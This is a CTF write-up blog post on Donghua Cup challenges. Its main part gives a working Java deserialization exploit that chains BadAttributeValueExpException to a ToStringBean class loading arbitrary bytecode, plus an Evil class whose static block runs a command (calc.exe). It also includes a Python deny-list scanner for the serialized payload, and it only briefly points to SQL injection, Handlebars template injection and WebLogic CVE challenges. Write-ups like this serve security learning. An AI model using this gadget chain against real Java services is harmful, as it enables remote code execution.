东华杯 (Donghua Cup)

EzGadget

This challenge looks very simple once I had debugged a few CC (Commons Collections) chains; see my other article.

Just find a class that overrides both readObject and toString. Here that class is BadAttributeValueExpException; debugging a few CC chains makes it clear what it can be used for (again, see my other article). In this challenge, ToStringBean's toString() passes arbitrary bytecode to defineClass, so all that is needed is to set the val field of BadAttributeValueExpException to a ToStringBean instance.

```java
// Decompiled toString() of the challenge's com.ezgame.ctf.tools.ToStringBean.
// defineClass(String, byte[], int, int) is ClassLoader's method (so ToStringBean must extend
// ClassLoader): whatever bytes are in ClassByte become a loaded class, and newInstance()
// runs that class's static initializer and constructor.
public String toString() {
    ToStringBean toStringBean = new ToStringBean();
    Class clazz = toStringBean.defineClass((String)null, this.ClassByte, 0, this.ClassByte.length);
    Object var3 = null;

    try {
        var3 = clazz.newInstance();
    } catch (InstantiationException var5) {
        var5.printStackTrace();
    } catch (IllegalAccessException var6) {
        var6.printStackTrace();
    }

    return "enjoy it.";
}
```

The exploit is as follows:

```java
import com.ezgame.ctf.tools.ToStringBean;
import com.ezgame.ctf.tools.Tools;

import javax.management.BadAttributeValueExpException;
import java.io.*;
import java.lang.reflect.Field;
import java.nio.file.Files;

public class Exec {
    public static void main(String[] args) {
        try {
            ToStringBean payload = new ToStringBean();

            // Bytecode of the class that ToStringBean.toString() will define and instantiate
            File clzFile = new File("C:\\Users\\86130\\Desktop\\Evil.class");
            // readAllBytes avoids the short-read risk of a single FileInputStream.read() call
            byte[] clzBytes = Files.readAllBytes(clzFile.toPath());
            payload.setClassByte(clzBytes);

            // BadAttributeValueExpException.readObject() calls val.toString(); val is private, so set it reflectively
            BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException("placeholder");
            Field field = badAttributeValueExpException.getClass().getDeclaredField("val");
            field.setAccessible(true);
            field.set(badAttributeValueExpException, payload);

            ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream();
            ObjectOutputStream out = new ObjectOutputStream(byteArrayOutputStream);

            // UTF/int prefix written before the object, matching what the reader below expects
            out.writeUTF("gadgets");
            out.writeInt(2021);
            out.writeObject(badAttributeValueExpException);

            String data = Tools.base64Encode(byteArrayOutputStream.toByteArray());
            System.out.println(data);

            // Decode and deserialize locally to confirm the payload triggers
            byte[] b = Tools.base64Decode(data);
            InputStream inputStream = new ByteArrayInputStream(b);
            ObjectInputStream objectInputStream = new ObjectInputStream(inputStream);
            String name = objectInputStream.readUTF();
            int year = objectInputStream.readInt();
            if (name.equals("gadgets") && year == 2021) {
                objectInputStream.readObject();
            }
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```

Just write the command to execute in Evil.java:

```java
public class Evil {
    // Runs as soon as the class is initialized by newInstance() in ToStringBean.toString()
    static {
        try {
            Runtime r = Runtime.getRuntime();
            Process p = r.exec(new String[]{"calc.exe"});
            p.waitFor();
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}
```
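As an added example that is not part of the original writeup, here is a defender-side check in Python for the base64-encoded stream the exploit above transmits: it validates the serialization magic, scans the stream for TC_CLASSDESC class names and rejects the two gadget classes before anything reaches readObject(). The sample stream (including its placeholder serialVersionUID) and the deny list are constructed here, not captured from the challenge.

```python
import base64
import re
import struct

STREAM_MAGIC = b"\xac\xed\x00\x05"
TC_CLASSDESC = 0x72
JAVA_NAME = re.compile(rb"^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)+$")
# Gadget classes the challenge's readObject() should refuse (deny list built from the chain above).
DENY = {"javax.management.BadAttributeValueExpException", "com.ezgame.ctf.tools.ToStringBean"}


def class_names(stream: bytes) -> list:
    """Heuristic scan for TC_CLASSDESC entries (0x72, u2 length, modified-UTF-8 class name).
    Not a full parser: TC_REFERENCE back-references are not followed, and a stray 0x72 inside
    field data is only filtered out by the class-name regex."""
    if not stream.startswith(STREAM_MAGIC):
        raise ValueError("not a Java serialization stream")
    found, i = [], len(STREAM_MAGIC)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            (n,) = struct.unpack(">H", stream[i + 1:i + 3])
            name = stream[i + 3:i + 3 + n]
            if len(name) == n and JAVA_NAME.match(name):
                found.append(name.decode())
                i += 3 + n  # skip the name so letters inside it are not re-scanned
                continue
        i += 1
    return found


def check_payload(b64: str) -> dict:
    """Decode the base64 transport the exploit uses and flag denied classes before readObject()."""
    names = class_names(base64.b64decode(b64))
    denied = [n for n in names if n in DENY]
    return {"classes": names, "denied": denied, "reject": bool(denied)}


def _utf(s: str) -> bytes:  # Java modified-UTF-8 for ASCII text: u2 length + bytes
    return struct.pack(">H", len(s)) + s.encode()


# Constructed sample, not a capture: header; the writeUTF("gadgets")/writeInt(2021) block data the exploit
# writes; the BadAttributeValueExpException descriptor (placeholder serialVersionUID, flags, one object
# field 'val', TC_ENDBLOCKDATA, TC_NULL superclass); then the nested ToStringBean descriptor.
SAMPLE = (
    STREAM_MAGIC
    + b"\x77\x0d" + _utf("gadgets") + struct.pack(">i", 2021)
    + b"\x73\x72" + _utf("javax.management.BadAttributeValueExpException")
    + b"\x00" * 8 + b"\x02\x00\x01" + b"L" + _utf("val") + b"\x74" + _utf("Ljava/lang/Object;")
    + b"\x78\x70" + b"\x73\x72" + _utf("com.ezgame.ctf.tools.ToStringBean")
)
SAMPLE_B64 = base64.b64encode(SAMPLE).decode()
```

The same deny-list idea is what a JEP 290 ObjectInputFilter would enforce inside the JVM; this scan is the out-of-process equivalent for traffic that carries the base64 blob.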

Eznode

Step one: injection at login.

The query result has to equal the user password that was submitted, so the injected query must produce that value itself ("self-output"); 第五空间 (the 5Space CTF) has tested this once before.

Step two is a Handlebars (hbs) template rendering vulnerability; see https://xz.aliyun.com/t/4695

apacheproy

Exploit a known CVE; I didn't notice it during the competition. It is a WebLogic application, version 12.2.1.3.

Reference: https://www.jianshu.com/p/7d14e45a96e7

OldLibrary

Another Go challenge.


Unless otherwise stated, all articles on this blog are licensed under CC BY-SA 4.0; please credit the source when reposting.